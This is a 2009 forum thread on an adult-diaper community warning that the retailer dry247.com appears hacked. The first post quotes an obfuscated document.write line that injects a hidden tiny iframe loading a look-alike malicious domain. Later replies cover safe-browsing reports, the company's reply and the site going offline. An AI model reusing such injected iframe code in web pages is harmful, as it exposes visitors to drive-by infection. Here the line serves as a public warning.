Dry247.com compromised

Status
Not open for further replies.

bgi39jsjw0ggg

Est. Contributor
Messages
980
Role
  1. Diaper Lover
Just a quick FYI to everyone - dry247.com, makers & sellers of my favorite diaper, seems to have been hacked. Site still functions, but stopbadware.org has found that the site has embedded malicious code.

Things like:

Code:
document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');

That's a quick snipped from their page source. It's an embedded inline frame 1 pixel wide by 2 pixels high that loads up a chinese attack site (there's a couple other sites it embeds, but I didn't feel like posting them), so avoid them. I haven't done any more poking around than just looking at their page source (haven't even checked on what it's downloading from microsotf.cn - no, that's not a type-o), but it's possible that their server is infected and intercepting credit card data as well.

I'll be checking on this every so often, but you can see updated results from stopbadware.org yourself here: Stopbadware.org - Report for www.dry247.com

Do not - repeat, DO NOT - visit dry247.com for any reason. If you absolutely have to, please use firefox and the noscript addon and deny script permission to dry247.com until they fix this problem. That will protect your computer from being compromised as well. Under no circumstances should you buy from their website, since nothing you do can protect you from that if their transaction system is indeed compromised. If you are desperate and have to buy some, their contact info is (copy & pasted from their website)

[email protected]

1-888-dry-247-8
(1-888-379-2478)

Dry Care
1425 37th street
Suite 613
Brooklyn, NY, 11218

This makes me sad, since they make my favorite diaper and was going to buy a case. I can wait a couple days while they clear this up, though.


**EDIT**
Thanks to Technologic:
Google Safe Browsing diagnostic page for www.dry247.com < a link to the Google diagnostic page for Dry24/7's page. I should have posted this in the first place, thanks for catching it Technologic )

I've sent an email to them just to make sure they know.

**EDIT, Jul 28th 2009**

Their site is still down, no update as of yet as to when it will be back up. Why is it so few companies ever consider security or disaster recovery until it's too late?
 
Last edited:
Messages
338
Role
  1. Diaper Lover
  2. Sissy
  3. Incontinent
OMG!!! I need some... I am running low here soon. You think if they know about this... they would put up underconstruction or something. Yikes!!!


EDIT PART:

Thank you so much for bringing this too out attention.
 
Last edited:

Technologic

Est. Contributor
Messages
160
Role
  1. Adult Baby
  2. Diaper Lover
Just for the hell of it I visited the site just to see what happens. But first of all I am on a VM so if anything happened i just delete the VM no big deal. I used chrome to get to it and of course it picked up on the fact that the site was infected. It gave me the option to see a google diagnostic of the page. If you are interested, The Diagnostic Page
Just if anyone wanted to see that. It about the site that tries to load up after you visit dry24/7 website.
 

Entity

Est. Contributor
Messages
1,232
Role
  1. Diaper Lover
  2. Private
If you still want to use the site, install the firefox NoScript extension. It won't allow any scripts like that from getting through without your knowledge. But more to the point, it is good that you people caught wind of a threat before it could do any real damage.
 

bgi39jsjw0ggg

Est. Contributor
Messages
980
Role
  1. Diaper Lover
Got a response from the Dry24/7 people today. They are aware of the problem now and they are working on a fix. They aren't sure how long it will take (a couple days?), and they say there is a possibility that they'll shut down the site for the time being.
 

Darkfinn

Banned
Messages
3,676
Role
  1. Diaper Lover
  2. Incontinent
This has been going on for some time... I think it is a misidentified code. They have added a popup advertising system to their site... to generate extra revenue I guess... I think it is being wrongly identified as malicious.
 

Technologic

Est. Contributor
Messages
160
Role
  1. Adult Baby
  2. Diaper Lover
This has been going on for some time... I think it is a misidentified code. They have added a popup advertising system to their site... to generate extra revenue I guess... I think it is being wrongly identified as malicious.

I don't think this is something they chose to do. I know they added popups but this is code that when you access their site it tries to force you onto a malicious website.
 

bgi39jsjw0ggg

Est. Contributor
Messages
980
Role
  1. Diaper Lover
This has been going on for some time... I think it is a misidentified code. They have added a popup advertising system to their site... to generate extra revenue I guess... I think it is being wrongly identified as malicious.

Yeah, this isn't just popups. The javascript obfuscation clearly embeds hidden frames that open up known-malicious web pages, and the Dry 24/7 people themselves told me that they're investigating the problem. They describe their site as "victimized" and are trying to repair the problem.
 

chevre

Est. Contributor
Messages
1,434
Role
  1. Diaper Lover
I think before there was an issue with the site being misclassified by Avast! as malicious, but that was solved a while ago. This is something new nasty. Thanks for pointing it out!
 
Last edited:

audio file

Est. Contributor
Messages
203
Role
  1. Adult Baby
  2. Diaper Lover
  3. Little
Norton antivirus has given an equally bad report on the site
 

Mauiman

Est. Contributor
Messages
625
Role
  1. Incontinent
All I can say is that it is very disgusting that people actually do this sort of a thing. They done it to a site that I go to a great number of times as well. And to think I was going to go and check them out for some new diapers or at least to try out a new kind of a thick comfy and absorbent diaper as well.
 

Darkfinn

Banned
Messages
3,676
Role
  1. Diaper Lover
  2. Incontinent
Well, they have taken the site down... at least until it is fixed... I wonder how many sales they will lose.
 

Somore

Contributor
Messages
18
Role
  1. Diaper Lover
I did call and order another box from DRY247. The price has gone up to $99 from $75.
 

chevre

Est. Contributor
Messages
1,434
Role
  1. Diaper Lover
I did call and order another box from DRY247. The price has gone up to $99 from $75.

That actually happened a while ago when the "overstock" sale ended. They're still worth it, but damn that was a good deal.
 

babysage

Est. Contributor
Messages
90
Role
  1. Diaper Lover
Well it figures that a site that would be visited by older adults would likely get hit. Before it got caught who knows what all got jacked from visitors.
 

chevre

Est. Contributor
Messages
1,434
Role
  1. Diaper Lover
I sort of doubt they specifically targeted the site. More likely it was either a worm, or they just scanned random websites looking for a vulnerability and that one happened to come up.
 

Slycamer

Est. Contributor
Messages
499
Role
  1. Diaper Lover
  2. Babyfur
just so you know i am reporting this to there coustomer service. i kept there email
 

chevre

Est. Contributor
Messages
1,434
Role
  1. Diaper Lover
just so you know i am reporting this to there coustomer service. i kept there email

Perhaps you should check their site (or the rest of this thread :p) first. They've already posted that they're aware of being compromised and the site is offline.
 
Status
Not open for further replies.
Top